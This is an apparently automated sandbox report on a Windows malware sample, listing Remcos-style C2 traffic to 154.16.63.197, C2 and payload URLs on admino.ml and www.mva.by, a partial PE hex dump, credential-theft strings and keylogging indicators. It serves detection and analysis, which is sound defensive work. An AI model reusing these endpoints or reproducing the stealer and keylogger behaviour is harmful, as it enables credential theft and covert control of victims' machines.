                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49751 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49815 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49878 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49942 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49982 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49984 -> 154.16.63.197:3360
                    Source: Network trafficSuricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49981 -> 154.16.63.197:3360
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://admino.ml/eme/gate.php
                    Source: Malware configuration extractorURLs: http://admino.ml/eme/kachistub.exe
                    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Dec 2024 16:57:34 GMTContent-Type: application/x-msdownloadContent-Length: 853504Connection: keep-aliveLast-Modified: Wed, 06 Jun 2018 00:46:15 GMTAccept-Ranges: bytesCache-Control: max-age=259200Expires: Mon, 16 Dec 2024 16:57:34 GMTData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 56 06 00 00 ac 06 00 00 00 00 00 d8 64 06 00 00 10 00 00 00 70 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 0d 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 1a 24 00 00 00 70 07 00 8c fb 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 06 00 c4 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 00 60 06 00 00 10 00 00 00 56 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 00 20 00 00 00 70 06 00 00 14 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 00 10 00 00 00 90 06 00 00 00 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 00 30 00 00 00 a0 06 00 00 26 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 d0 06 00 00 00 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 00 10 00 00 00 e0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 00 80 00 00 00 f0 06 00 00 74 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 00 06 00 00 70 07 00 00 fc 05 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 00 00 00 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
                    Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.5:49704 -> 93.125.99.121:80
                    Source: global trafficHTTP traffic detected: GET /tags/scan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mva.byConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004020D0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004020D0
                    Source: global trafficHTTP traffic detected: GET /tags/scan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mva.byConnection: Keep-Alive
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SGS.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: www.mva.by
                    Source: global trafficDNS traffic detected: DNS query: admino.ml
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: http://admino.ml/eme/gate.php
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: http://admino.ml/eme/kachistub.exe
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
                    Source: SGS.exe, 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/=
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/G
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/T
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exe
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeLMEM
                    Source: file.exe, 00000009.00000002.2306159539.000000000090E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000009.00000003.2304232651.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeRRC:
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exe_A
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.execrC:
                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeh
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mva.by/tags/scan.exeystem32
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: file.exe, 00000000.00000002.2142430073.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture and log keystrokes
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Esc] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Enter] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Tab] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: [Down] 11_2_004051EA
